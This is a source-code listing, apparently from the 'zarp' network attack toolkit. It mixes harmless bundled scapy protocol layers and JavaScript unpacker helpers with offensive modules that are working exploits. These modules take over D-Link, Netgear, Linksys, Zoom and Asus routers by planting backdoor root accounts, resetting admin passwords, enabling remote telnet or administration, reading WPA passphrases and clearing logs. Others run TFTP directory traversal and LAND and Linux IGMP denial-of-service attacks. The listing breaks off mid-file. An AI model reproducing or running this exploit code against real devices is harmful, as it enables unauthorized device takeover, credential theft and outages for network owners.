this 7 | unpacker. Lower number means higher priority. 8 | Makes sense only if a source file has been packed with 9 | more than one packer. 10 | * `detect(source)` : returns `True` if source is packed, otherwise, `False`. 11 | * `unpack(source)` : takes a `source` string and unpacks it. Must always return 12 | valid JavaScript. That is to say, your code should look 13 | like: 14 | 15 | ``` 16 | if detect(source): 17 | return do_your_fancy_things_with(source) 18 | else: 19 | return source 20 | ``` 21 | 22 | *You can safely define any other symbol in your module, as it will be ignored.* 23 | 24 | `__init__` code will automatically load new unpackers, without any further step 25 | to be accomplished. Simply drop it in this directory. 26 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/netgear/wnr2000_get_pass.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import util 3 | from ..router_vuln import RouterVuln 4 | 5 | 6 | class wnr2000_get_pass(RouterVuln): 7 | 8 | def __init__(self): 9 | self.router = 'WNR2000 v1.2.0.8' 10 | self.vuln = 'Read WPA/WPA2 Password' 11 | super(wnr2000_get_pass, self).__init__() 12 | 13 | self.info = """ 14 | Read the WPA/WPA2 passphrase 15 | http://www.exploit-db.com/exploits/9498/ 16 | """ 17 | 18 | def initialize(self): 19 | util.Msg('Fetching password from %s...' % self.config['target'].value) 20 | url = 'http://%s/router-info.htm' % self.config['target'].value 21 | url2 = 'http://%s/cgi-bin/router-info.htm' % self.config['target'].value 22 | try: 23 | response = urllib.urlopen(url).read() 24 | response2 = urllib.urlopen(url2).read() 25 | util.Msg('First:') 26 | print '\t' + response 27 | util.Msg('Second:') 28 | print '\t' + response2 29 | except Exception, e: 30 | util.Error('Error: %s' % e) 31 | -------------------------------------------------------------------------------- /src/lib/libmproxy/contrib/jsbeautifier/unpackers/urlencode.py: -------------------------------------------------------------------------------- 1 | # 2 | # Trivial bookmarklet/escaped script detector for the javascript beautifier 3 | # written by Einar Lielmanis 4 | # rewritten in Python by Stefano Sanfilippo 5 | # 6 | # Will always return valid javascript: if `detect()` is false, `code` is 7 | # returned, unmodified. 8 | # 9 | # usage: 10 | # 11 | # some_string = urlencode.unpack(some_string) 12 | # 13 | 14 | """Bookmarklet/escaped script unpacker.""" 15 | 16 | # Python 2 retrocompatibility 17 | # pylint: disable=F0401 18 | # pylint: disable=E0611 19 | try: 20 | from urllib import unquote_plus 21 | except ImportError: 22 | from urllib.parse import unquote_plus 23 | 24 | PRIORITY = 0 25 | 26 | def detect(code): 27 | """Detects if a scriptlet is urlencoded.""" 28 | # the fact that script doesn't contain any space, but has %20 instead 29 | # should be sufficient check for now. 30 | return ' ' not in code and ('%20' in code or code.count('%') > 3) 31 | 32 | def unpack(code): 33 | """URL decode `code` source string.""" 34 | return unquote_plus(code) if detect(code) else code 35 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/dlink/add_admin_605.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import util 3 | from ..router_vuln import RouterVuln 4 | 5 | class add_admin_605(RouterVuln): 6 | 7 | def __init__(self): 8 | self.router = 'DIR-605 v2.00' 9 | self.vuln = 'Backdoor Root' 10 | super(add_admin_605, self).__init__() 11 | 12 | self.info = """ 13 | Adds a backdoor root account to the router 14 | http://www.exploit-db.com/exploits/18638/ 15 | """ 16 | 17 | def initialize(self): 18 | util.Msg('Adding admin \'adm4n\' with password \'d3fault\'') 19 | url = 'http://%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0' % self.config['target'].value 20 | params = urllib.urlencode({'ACTION_POST':1, 'admin_name':'adm4n','admin_password':'d3fault', 21 | 'admin_password2':'d3fault'}) 22 | try: 23 | response = urllib.urlopen(url,params).read() 24 | util.Msg('Done. Connect to %s with \'adm4n:d3fault\'' % self.config['target'].value) 25 | except Exception, e: 26 | util.Error('Failed: %s' % e) 27 | return 28 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/dlink/add_admin_300.py: -------------------------------------------------------------------------------- 1 | import util 2 | import urllib 3 | from ..router_vuln import RouterVuln 4 | 5 | 6 | class add_admin_300(RouterVuln): 7 | 8 | def __init__(self): 9 | self.router = 'DIR-300 v1.04' 10 | self.vuln = 'Change Admin Password' 11 | super(add_admin_300, self).__init__() 12 | 13 | self.info = """ 14 | Modify the default admin password to 'd3fault' 15 | http://www.exploit-db.com/exploits/15753/ 16 | """ 17 | 18 | def initialize(self): 19 | util.Msg('Changing admin password to \'d3fault\'...') 20 | url = 'http://%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0' % self.config['target'].value 21 | params = urllib.urlencode({'ACTION_POST':1,'admin_name':'admin', 22 | 'admin_password1':'d3fault','admin_password2':'d3fault', 23 | 'rt_enable_h':1,'rt_port':8080,'rt_ipaddr':'192.168.0.1337'}) 24 | 25 | try: 26 | urllib.urlopen(url, params).read() 27 | util.Msg('Done. Admin password changed to \'d3fault\'') 28 | except Exception, e: 29 | util.Error("Error: %s" % e) 30 | return 31 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/dlink/change_admin_1310.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import util 3 | from ..router_vuln import RouterVuln 4 | 5 | 6 | class change_admin_1310(RouterVuln): 7 | 8 | def __init__(self): 9 | self.router = 'WBR-1310 v2.0' 10 | self.vuln = 'Change Admin Password' 11 | super(change_admin_1310, self).__init__() 12 | 13 | self.info = """ 14 | Changes the admin psasword to d3fault and enables 15 | remote administration on port 8080. 16 | http://www.exploit-db.com/exploits/15810/ 17 | """ 18 | 19 | def initialize(self): 20 | util.Msg('Changing admin password to \'d3fault\' ' 21 | 'and enabling remote admin on port 8080...') 22 | try: 23 | url = 'http://%s/tools_admin.cgi?admname=admin&admPass1=d3fault' \ 24 | '&admPass2=d3fault&username=admin&userPass1=d3fault&userPass2=d3fault' \ 25 | '&hip1=*&hport=8080&hEnable=1' % self.config['target'].value 26 | urllib.urlopen(url).read() 27 | util.Msg('Admin password changed to \'d3fault\' ' 28 | 'and interface enabled on 8080') 29 | except Exception, e: 30 | util.Error('Error: %s' % e) 31 | -------------------------------------------------------------------------------- /src/lib/scapy/layers/rip.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.packet import * 7 | from scapy.fields import * 8 | from scapy.layers.inet import UDP 9 | 10 | class RIP(Packet): 11 | name = "RIP header" 12 | fields_desc = [ 13 | ByteEnumField("cmd",1,{1:"req",2:"resp",3:"traceOn",4:"traceOff",5:"sun", 14 | 6:"trigReq",7:"trigResp",8:"trigAck",9:"updateReq", 15 | 10:"updateResp",11:"updateAck"}), 16 | ByteField("version",1), 17 | ShortField("null",0), 18 | ] 19 | 20 | class RIPEntry(Packet): 21 | name = "RIP entry" 22 | fields_desc = [ 23 | ShortEnumField("AF",2,{2:"IP"}), 24 | ShortField("RouteTag",0), 25 | IPField("addr","0.0.0.0"), 26 | IPField("mask","0.0.0.0"), 27 | IPField("nextHop","0.0.0.0"), 28 | IntEnumField("metric",1,{16:"Unreach"}), 29 | ] 30 | 31 | 32 | 33 | bind_layers( UDP, RIP, sport=520) 34 | bind_layers( UDP, RIP, dport=520) 35 | bind_layers( RIP, RIPEntry, ) 36 | bind_layers( RIPEntry, RIPEntry, ) 37 | -------------------------------------------------------------------------------- /src/modules/dos/land_dos.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | from dos import DoS 3 | import util 4 | 5 | 6 | class land_dos(DoS): 7 | def __init__(self): 8 | super(land_dos, self).__init__('LAND DoS') 9 | conf.verb = 0 10 | self.info = """ 11 | Oldie but a goodie. This exploits the classic LAND attack 12 | against Windows machines. Essentially we set the source 13 | equal to the destination, which causes a loop and 14 | eventually a crash. 15 | 16 | http://insecure.org/sploits/land.ip.DOS.html 17 | """ 18 | 19 | def initialize(self): 20 | target = self.config['target'].value 21 | pkt = IP(src=target, dst=target) 22 | pkt /= TCP(sport=134, dport=134) 23 | 24 | while True: 25 | print '[!] DoSing %s...' % target 26 | send(pkt) 27 | 28 | if self.is_alive(): 29 | util.Msg('Host appears to still be up.') 30 | try: 31 | tmp = raw_input('[!] Try again? [Y/n] ') 32 | except Exception: 33 | break 34 | if 'n' in tmp.lower(): 35 | break 36 | else: 37 | util.Msg('Host not responding!') 38 | break -------------------------------------------------------------------------------- /src/lib/libmproxy/contrib/jsbeautifier/unpackers/evalbased.py: -------------------------------------------------------------------------------- 1 | # 2 | # Unpacker for eval() based packers, a part of javascript beautifier 3 | # by Einar Lielmanis 4 | # 5 | # written by Stefano Sanfilippo 6 | # 7 | # usage: 8 | # 9 | # if detect(some_string): 10 | # unpacked = unpack(some_string) 11 | # 12 | 13 | """Unpacker for eval() based packers: runs JS code and returns result. 14 | Works only if a JS interpreter (e.g. Mozilla's Rhino) is installed and 15 | properly set up on host.""" 16 | 17 | from subprocess import PIPE, Popen 18 | 19 | PRIORITY = 3 20 | 21 | def detect(source): 22 | """Detects if source is likely to be eval() packed.""" 23 | return source.strip().lower().startswith('eval(function(') 24 | 25 | def unpack(source): 26 | """Runs source and return resulting code.""" 27 | return jseval('print %s;' % source[4:]) if detect(source) else source 28 | 29 | # In case of failure, we'll just return the original, without crashing on user. 30 | def jseval(script): 31 | """Run code in the JS interpreter and return output.""" 32 | try: 33 | interpreter = Popen(['js'], stdin=PIPE, stdout=PIPE) 34 | except OSError: 35 | return script 36 | result, errors = interpreter.communicate(script) 37 | if interpreter.poll() or errors: 38 | return script 39 | return result 40 | -------------------------------------------------------------------------------- /src/core/colors.py: -------------------------------------------------------------------------------- 1 | class color: 2 | """ Define plain colors 3 | """ 4 | GRAY = '\033[30m' 5 | RED = '\033[31m' 6 | GREEN = '\033[32m' 7 | YELLOW = '\033[33m' 8 | BLUE = '\033[34m' 9 | MAGENTA = '\033[35m' 10 | CYAN = '\033[36m' 11 | WHITE = '\033[37m' 12 | CRIMSON = '\033[38m' 13 | 14 | """ Define highlighted colors 15 | """ 16 | RED_HL = '\033[41m' 17 | GREEN_HL = '\033[42m' 18 | BROWN_HL = '\033[43m' 19 | BLUE_HL = '\033[44m' 20 | MAGENTA_HL = '\033[45m' 21 | CYAN_HL = '\033[46m' 22 | GRAY_HL = '\033[47m' 23 | WHITE_HL = '\033[48m' 24 | 25 | """ Define bold colors 26 | """ 27 | B_GRAY = '\033[1;30m' 28 | B_RED = '\033[1;31m' 29 | B_GREEN = '\033[1;32m' 30 | B_YELLOW = '\033[1;33m' 31 | B_BLUE = '\033[1;34m' 32 | B_MAGENTA = '\033[1;35m' 33 | B_CYAN = '\033[1;36m' 34 | B_WHITE = '\033[1;37m' 35 | B_CRIMSON = '\033[1;38m' 36 | 37 | """ Define bold highlighted colors 38 | """ 39 | B_RED_HL = '\033[1;41m' 40 | B_GREEN_HL = '\033[1;42m' 41 | B_BROWN_HL = '\033[1;43m' 42 | B_BLUE_HL = '\033[1;44m' 43 | B_MAGENTA_HL = '\033[1;45m' 44 | B_CYAN_HL = '\033[1;46m' 45 | B_GRAY_HL = '\033[1;47m' 46 | B_WHITE_HL = '\033[1;48m' 47 | 48 | """ Define end variable to cancel colors 49 | """ 50 | END = '\033[0m' 51 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/cisco/kits_dtraverse.py: -------------------------------------------------------------------------------- 1 | from ..router_vuln import RouterVuln 2 | import socket 3 | import util 4 | 5 | 6 | class kits_dtraverse(RouterVuln): 7 | 8 | def __init__(self): 9 | self.router = 'CiscoKits 1.0 TFTP' 10 | self.vuln = 'Directory Traversal' 11 | super(kits_dtraverse, self).__init__() 12 | 13 | self.info = """ 14 | Exploit a directory traversal vulnerability 15 | http://www.exploit-db.com/exploits/17619/ 16 | """ 17 | 18 | def send(self, retr): 19 | """Send and receive""" 20 | try: 21 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 22 | sock.settimeout(5) 23 | sock.sendto(retr, (self.config['target'].value, 69)) 24 | data = sock.recv(1024) 25 | sock.close() 26 | except Exception, e: 27 | util.Error('Error with host: %s' % e) 28 | return None 29 | return data.strip() 30 | 31 | def initialize(self): 32 | try: 33 | while True: 34 | retr = raw_input('C:\\') 35 | retr = retr.replace('/', '\\') 36 | 37 | pkt = '\x00\x01' 38 | pkt += '../' * 10 + retr + '\x00' 39 | pkt += 'netascii\x00' 40 | data = self.send(pkt) 41 | print data 42 | except: 43 | return 44 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/dlink/backdoor_250n.py: -------------------------------------------------------------------------------- 1 | import util 2 | import paramiko 3 | from ..router_vuln import RouterVuln 4 | 5 | 6 | class backdoor_250n(RouterVuln): 7 | 8 | def __init__(self): 9 | self.router = 'DSR-250N' 10 | self.vuln = 'Add Admin' 11 | super(backdoor_250n, self).__init__() 12 | 13 | self.info = """ 14 | Add persistent root account. 15 | http://www.exploit-db.com/exploits/22930/ 16 | """ 17 | 18 | def initialize(self): 19 | util.Msg('Adding \'r00t:d3fault\'...') 20 | try: 21 | ssh = paramiko.SSHClient() 22 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 23 | connection = ssh.connect(self.config['target'].value, 24 | username='admin', password='admin', timeout=3.0) 25 | channel = connection.get_transport().open_session() 26 | # add user 27 | channel.exec_command('system users edit 1') 28 | channel.exec_command('username r00t') 29 | channel.exec_command('password d3fault') 30 | channel.exec_command('save') 31 | connection.close() 32 | except paramiko.AuthenticationException: 33 | util.Error('Default credentials disabled/changed.') 34 | except Exception, e: 35 | util.Error('Error: %s' % e) 36 | return 37 | 38 | util.Msg('Done.') 39 | -------------------------------------------------------------------------------- /src/core/zoption.py: -------------------------------------------------------------------------------- 1 | from util import eval_type 2 | 3 | 4 | class Zoption: 5 | """ generic option class for managing and validating 6 | zarp options. 7 | """ 8 | 9 | def __init__(self, value=None, type=None, required=False, display=None, opts=None): 10 | self.value = value 11 | if isinstance(type, basestring): 12 | self.types = [type] 13 | self.type = type 14 | else: 15 | self.types = type 16 | self.type = None 17 | self.required = required 18 | self.display = display 19 | self.opts = opts 20 | 21 | def getStr(self): 22 | """ Some objects don't have a __str__ method (regex), 23 | so we'll need to return the string representation 24 | of the object. 25 | """ 26 | if self.value is None: 27 | return None 28 | elif self.type == "regex": 29 | return self.value.pattern 30 | elif self.type == 'list': 31 | return '[list]' 32 | else: 33 | return str(self.value) 34 | 35 | def validate(self): 36 | """ Validates the object's value to ensure it conforms 37 | to whatever type the object dictates. 38 | """ 39 | for t in self.types: 40 | rvals = eval_type(self.value, t) 41 | if rvals[0]: 42 | self.value = rvals[1] 43 | self.type = t 44 | return True 45 | return False -------------------------------------------------------------------------------- /config/replacements: -------------------------------------------------------------------------------- 1 | # 2 | # zarp's match and replace config file for the Replacer 3 | # module. Entries should be listed in the following form: 4 | # 5 | # match = match replace 6 | # 7 | # This module supports two different match forms; regex and HTML tags. In 8 | # the first case, anything that re.sub accepts, this will accept. In the 9 | # latter case, tags can be specified in the following: 10 | # 11 | # 2 img src = http://google.com 12 | # 13 | # This will parse each img tag and replace the src with http://google.com. To 14 | # distinguish between the two types, 1 should be prefixed to regex entries, and 15 | # 2 should be prefixed to HTML tags. 16 | # 17 | # Several test entries have been listed here. The regex isnt perfect because regex 18 | # with HTML is a monster. 19 | # 20 | 21 | # match img tags and replace the src with rick astley 22 | #1 (?<= 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.packet import * 7 | from scapy.fields import * 8 | 9 | _rtp_payload_types = { 10 | # http://www.iana.org/assignments/rtp-parameters 11 | 0: 'G.711 PCMU', 3: 'GSM', 12 | 4: 'G723', 5: 'DVI4', 13 | 6: 'DVI4', 7: 'LPC', 14 | 8: 'PCMA', 9: 'G722', 15 | 10: 'L16', 11: 'L16', 16 | 12: 'QCELP', 13: 'CN', 17 | 14: 'MPA', 15: 'G728', 18 | 16: 'DVI4', 17: 'DVI4', 19 | 18: 'G729', 25: 'CelB', 20 | 26: 'JPEG', 28: 'nv', 21 | 31: 'H261', 32: 'MPV', 22 | 33: 'MP2T', 34: 'H263' } 23 | 24 | class RTP(Packet): 25 | name="RTP" 26 | fields_desc = [ BitField('version', 2, 2), 27 | BitField('padding', 0, 1), 28 | BitField('extension', 0, 1), 29 | BitFieldLenField('numsync', None, 4, count_of='sync'), 30 | BitField('marker', 0, 1), 31 | BitEnumField('payload', 0, 7, _rtp_payload_types), 32 | ShortField('sequence', 0), 33 | IntField('timestamp', 0), 34 | IntField('sourcesync', 0), 35 | FieldListField('sync', [], IntField("id",0), count_from=lambda pkt:pkt.numsync) ] 36 | 37 | -------------------------------------------------------------------------------- /src/lib/scapy/layers/ir.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.packet import * 7 | from scapy.fields import * 8 | from scapy.layers.l2 import CookedLinux 9 | 10 | 11 | 12 | # IR 13 | 14 | class IrLAPHead(Packet): 15 | name = "IrDA Link Access Protocol Header" 16 | fields_desc = [ XBitField("Address", 0x7f, 7), 17 | BitEnumField("Type", 1, 1, {"Response":0, 18 | "Command":1})] 19 | 20 | class IrLAPCommand(Packet): 21 | name = "IrDA Link Access Protocol Command" 22 | fields_desc = [ XByteField("Control", 0), 23 | XByteField("Format identifier", 0), 24 | XIntField("Source address", 0), 25 | XIntField("Destination address", 0xffffffffL), 26 | XByteField("Discovery flags", 0x1), 27 | ByteEnumField("Slot number", 255, {"final":255}), 28 | XByteField("Version", 0)] 29 | 30 | 31 | class IrLMP(Packet): 32 | name = "IrDA Link Management Protocol" 33 | fields_desc = [ XShortField("Service hints", 0), 34 | XByteField("Character set", 0), 35 | StrField("Device name", "") ] 36 | 37 | 38 | bind_layers( CookedLinux, IrLAPHead, proto=23) 39 | bind_layers( IrLAPHead, IrLAPCommand, Type=1) 40 | bind_layers( IrLAPCommand, IrLMP, ) 41 | -------------------------------------------------------------------------------- /src/modules/dos/igmp_nix.py: -------------------------------------------------------------------------------- 1 | from dos import DoS 2 | from struct import pack 3 | from socket import inet_aton 4 | from scapy.all import send, IP, conf, checksum 5 | import util 6 | 7 | 8 | class igmp_nix(DoS): 9 | """ 10 | First send an IGMPv2 query, followed by an IGMPv3 query 11 | with a max response time of 0; results in a division by 12 | zero in the kernel 13 | """ 14 | def __init__(self): 15 | super(igmp_nix, self).__init__('Linux 2.6.36 - 3.2.1 IGMP DoS') 16 | conf.verb = 0 17 | self.info = """ 18 | Exploits an IGMPv2 DoS in Linux kernel version 19 | 2.6.36 >= to < 3.2.1. 20 | 21 | More information on the sploit: 22 | http://www.exploit-db.com/exploits/18378/ 23 | """ 24 | 25 | def initialize(self): 26 | igmpv2 = pack("!BBH", 0x11, 0xff, 0) + inet_aton("224.0.0.1") 27 | igmpv3 = pack("!BBH", 0x11, 0x0, 0) + inet_aton("0.0.0.0") \ 28 | + pack("!BBBB", 0, 0, 0, 0) 29 | 30 | igmpv2 = igmpv2[:2] + pack("!H", checksum(igmpv2)) + igmpv2[4:] 31 | igmpv3 = igmpv3[:2] + pack('!H', checksum(igmpv3)) + igmpv3[4:] 32 | 33 | send(IP(dst=self.target, proto=2) / igmpv2) 34 | send(IP(dst=self.target, proto=2) / igmpv3) 35 | 36 | if self.is_alive(): 37 | util.Msg('Host still up.') 38 | else: 39 | util.Msg('Host not responding - it\'s either down or ' 40 | 'rejecting our probes.') 41 | -------------------------------------------------------------------------------- /src/modules/sniffer/traffic_sniffer.py: -------------------------------------------------------------------------------- 1 | from util import Error, test_filter 2 | from sniffer import Sniffer 3 | from scapy.all import * 4 | from zoption import Zoption 5 | 6 | 7 | class traffic_sniffer(Sniffer): 8 | def __init__(self): 9 | super(traffic_sniffer, self).__init__('Traffic Sniffer') 10 | self.config.update({"filter":Zoption(type = "str", 11 | value = "src {0} or dst {0}", 12 | required = False, 13 | display = "Traffic filter") 14 | }) 15 | self.info = """ 16 | This module can be used as a simple traffic sniffer. 17 | A filter option is provided to use tcpdump/scapy-esque 18 | filter syntax to narrow down the information provided.""" 19 | 20 | def initialize(self): 21 | """ Initialize sniffer 22 | """ 23 | if test_filter(self.config['filter'].value): 24 | self.sniff_filter = self.config['filter'].value.format( 25 | self.config['target'].value) 26 | self.run() 27 | else: 28 | Error("Error with provided filter.") 29 | return False 30 | return True 31 | 32 | def dump(self, pkt): 33 | """ Sniffer callback; print summary 34 | """ 35 | if not pkt is None: 36 | self.log_msg(pkt.summary()) 37 | 38 | def session_view(self): 39 | """ Overridden to include filter 40 | """ 41 | return "%s [%s]" % (self.config['target'].value, 42 | self.config['filter'].value) 43 | -------------------------------------------------------------------------------- /src/lib/scapy/layers/netflow.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.fields import * 7 | from scapy.packet import * 8 | 9 | # Cisco Netflow Protocol version 1 10 | class NetflowHeader(Packet): 11 | name = "Netflow Header" 12 | fields_desc = [ ShortField("version", 1) ] 13 | 14 | class NetflowHeaderV1(Packet): 15 | name = "Netflow Header V1" 16 | fields_desc = [ ShortField("count", 0), 17 | IntField("sysUptime", 0), 18 | IntField("unixSecs", 0), 19 | IntField("unixNanoSeconds", 0) ] 20 | 21 | 22 | class NetflowRecordV1(Packet): 23 | name = "Netflow Record" 24 | fields_desc = [ IPField("ipsrc", "0.0.0.0"), 25 | IPField("ipdst", "0.0.0.0"), 26 | IPField("nexthop", "0.0.0.0"), 27 | ShortField("inputIfIndex", 0), 28 | ShortField("outpuIfIndex", 0), 29 | IntField("dpkts", 0), 30 | IntField("dbytes", 0), 31 | IntField("starttime", 0), 32 | IntField("endtime", 0), 33 | ShortField("srcport", 0), 34 | ShortField("dstport", 0), 35 | ShortField("padding", 0), 36 | ByteField("proto", 0), 37 | ByteField("tos", 0), 38 | IntField("padding1", 0), 39 | IntField("padding2", 0) ] 40 | 41 | 42 | bind_layers( NetflowHeader, NetflowHeaderV1, version=1) 43 | bind_layers( NetflowHeaderV1, NetflowRecordV1, ) 44 | -------------------------------------------------------------------------------- /src/lib/scapy/layers/mgcp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.packet import * 7 | from scapy.fields import * 8 | from scapy.layers.inet import UDP 9 | 10 | class MGCP(Packet): 11 | name = "MGCP" 12 | longname = "Media Gateway Control Protocol" 13 | fields_desc = [ StrStopField("verb","AUEP"," ", -1), 14 | StrFixedLenField("sep1"," ",1), 15 | StrStopField("transaction_id","1234567"," ", -1), 16 | StrFixedLenField("sep2"," ",1), 17 | StrStopField("endpoint","dummy@dummy.net"," ", -1), 18 | StrFixedLenField("sep3"," ",1), 19 | StrStopField("version","MGCP 1.0 NCS 1.0","\x0a", -1), 20 | StrFixedLenField("sep4","\x0a",1), 21 | ] 22 | 23 | 24 | #class MGCP(Packet): 25 | # name = "MGCP" 26 | # longname = "Media Gateway Control Protocol" 27 | # fields_desc = [ ByteEnumField("type",0, ["request","response","others"]), 28 | # ByteField("code0",0), 29 | # ByteField("code1",0), 30 | # ByteField("code2",0), 31 | # ByteField("code3",0), 32 | # ByteField("code4",0), 33 | # IntField("trasid",0), 34 | # IntField("req_time",0), 35 | # ByteField("is_duplicate",0), 36 | # ByteField("req_available",0) ] 37 | # 38 | bind_layers( UDP, MGCP, dport=2727) 39 | bind_layers( UDP, MGCP, sport=2727) 40 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/linksys/wag54gs_change_admin.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import util 3 | from ..router_vuln import RouterVuln 4 | 5 | 6 | class wag54gs_change_admin(RouterVuln): 7 | 8 | def __init__(self): 9 | self.router = 'WAG54GS v1.01.03' 10 | self.vuln = 'Change Admin Password' 11 | super(wag54gs_change_admin, self).__init__() 12 | 13 | self.info = """ 14 | Change the admin password to d3fault. 15 | http://www.exploit-db.com/exploits/18503/ 16 | """ 17 | 18 | def initialize(self): 19 | util.Msg('Changing admin password to \'d3fault\'...') 20 | try: 21 | url = 'http://%s/setup.cgi' % self.config['target'].value 22 | params = urllib.urlencode({'user_list':'1','sysname':'admin','sysPasswd':'d3fault', 23 | 'sysConfirmPasswd':'d3fault','remote_management':'disable', 24 | 'devname':'','snmp_enable':'disable','upnp_enable':'enable', 25 | 'wlan_enable':'disable','save':'Save+Settings','h_user_list':'1', 26 | 'h_pwset':'yes','sysname_changed':'no','pwchanged':'yes', 27 | 'pass_is_default':'false','pass_is_none':'no','h_remote_management':'disable', 28 | 'c4_trap_ip':'','h_snmp_enable':'disable','h_upnp_enable':'enable', 29 | 'h_wlan_enable':'disable','todo':'save','this_file':'Administration.htm', 30 | 'next_file':'Administration.htm','message':''}) 31 | 32 | response = urllib.urlopen(url, params).read() 33 | print response 34 | util.Msg('Done. Password reset to \'d3fault\'') 35 | except Exception, e: 36 | util.Error('Error: %s' % e) 37 | -------------------------------------------------------------------------------- /src/lib/scapy/layers/mobileip.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.fields import * 7 | from scapy.packet import * 8 | from scapy.layers.inet import IP,UDP 9 | 10 | 11 | class MobileIP(Packet): 12 | name = "Mobile IP (RFC3344)" 13 | fields_desc = [ ByteEnumField("type", 1, {1:"RRQ", 3:"RRP"}) ] 14 | 15 | class MobileIPRRQ(Packet): 16 | name = "Mobile IP Registration Request (RFC3344)" 17 | fields_desc = [ XByteField("flags", 0), 18 | ShortField("lifetime", 180), 19 | IPField("homeaddr", "0.0.0.0"), 20 | IPField("haaddr", "0.0.0.0"), 21 | IPField("coaddr", "0.0.0.0"), 22 | LongField("id", 0), ] 23 | 24 | class MobileIPRRP(Packet): 25 | name = "Mobile IP Registration Reply (RFC3344)" 26 | fields_desc = [ ByteField("code", 0), 27 | ShortField("lifetime", 180), 28 | IPField("homeaddr", "0.0.0.0"), 29 | IPField("haaddr", "0.0.0.0"), 30 | LongField("id", 0), ] 31 | 32 | class MobileIPTunnelData(Packet): 33 | name = "Mobile IP Tunnel Data Message (RFC3519)" 34 | fields_desc = [ ByteField("nexthdr", 4), 35 | ShortField("res", 0) ] 36 | 37 | 38 | bind_layers( UDP, MobileIP, sport=434) 39 | bind_layers( UDP, MobileIP, dport=434) 40 | bind_layers( MobileIP, MobileIPRRQ, type=1) 41 | bind_layers( MobileIP, MobileIPRRP, type=3) 42 | bind_layers( MobileIP, MobileIPTunnelData, type=4) 43 | bind_layers( MobileIPTunnelData, IP, nexthdr=4) 44 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/zoom/x4_5_mod_password.py: -------------------------------------------------------------------------------- 1 | from ..router_vuln import RouterVuln 2 | import util 3 | import urllib 4 | 5 | 6 | class x4_5_mod_password(RouterVuln): 7 | 8 | def __init__(self): 9 | self.router = 'X4/X5 ADSL Modem/Router <=2.5 and 3.0' 10 | self.vuln = 'Change Admin Password' 11 | super(x4_5_mod_password, self).__init__() 12 | 13 | self.info = """ 14 | Modify the administrative password to 'd3fault' 15 | http://seclists.org/bugtraq/2013/Jul/56 16 | """ 17 | 18 | def initialize(self): 19 | version = util.get_input('Enter Zoom version [2/3]: ') 20 | util.Msg('Changing admin password to \'d3fault\'...') 21 | 22 | url_25 = 'http://%s/hag/emweb/PopOutUserModify.htm/FormOne&user=admin&'\ 23 | 'ex_param1=admin&new_pass1=d3fault&new_pass2=d3fault&id=3&'\ 24 | 'cmdSubmit=Save+Changes' % self.config['target'].value 25 | url_30 = 'http://%s/hag/emweb/PopOutUserModify.htm?id=40&user=admin&'\ 26 | 'Zadv=1&ex_param1=admin&new_pass1=d3fault&new_pass2=d3fault&'\ 27 | 'id=3&cmdSubmit=Save+Changes' % self.config['target'].value 28 | url_logs = 'http://%s/Action?id=76&cmdClear+Log=Clear+Log' % self.config['target'].value 29 | 30 | try: 31 | if version == '2': 32 | urllib.urlopen(url_25).read() 33 | else: 34 | urllib.urlopen(url_30).read() 35 | 36 | util.Msg("Password reset, clearing logs...") 37 | urllib.urlopen(url_logs).read() 38 | util.Msg('Done. Connect to %s with admin:d3fault' % self.config['target'].value) 39 | except Exception, e: 40 | util.Error('Unable to connect: %s' % e) 41 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/asus/rt56u_change_admin.py: -------------------------------------------------------------------------------- 1 | from urllib import urlencode, urlopen 2 | import util 3 | from ..router_vuln import RouterVuln 4 | 5 | 6 | class rt56u_change_admin(RouterVuln): 7 | 8 | def __init__(self): 9 | self.router = 'RT-N56U <= v1.0.7f' 10 | self.vuln = 'Change Admin Password' 11 | super(rt56u_change_admin, self).__init__() 12 | 13 | self.info = """ 14 | Change the admin password and enable the remote telnet server 15 | http://forelsec.blogspot.com/2013/02/asus-rt56u-multiple-vulnerabilities.html 16 | """ 17 | 18 | def initialize(self): 19 | util.Msg('Changing admin password and enabling remote telnet server...') 20 | try: 21 | data = urlencode({'productid':'RT-N56U', 'current_page':'Advanced_System_Content.asp', 22 | 'next_page':'', 'next_host':'', 'sid_list':'LANHostConfig%3BGeneral%3B', 23 | 'group_id':'', 'modified':'0', 'action_mode':'+Apply+','first_time':'', 24 | 'action_script':'','preferred_lang':'EN','wl_ssid2':'wat','firmver':'1.0.7f', 25 | 'http_passwd':'d3fault','http_passwd2':'d3fault','v_password2':'d3fault', 26 | 'log_ipaddr':'', 'time_zone':'UCT12', 'ntp_server0':'pool.ntp.org','telnetd':'1'}) 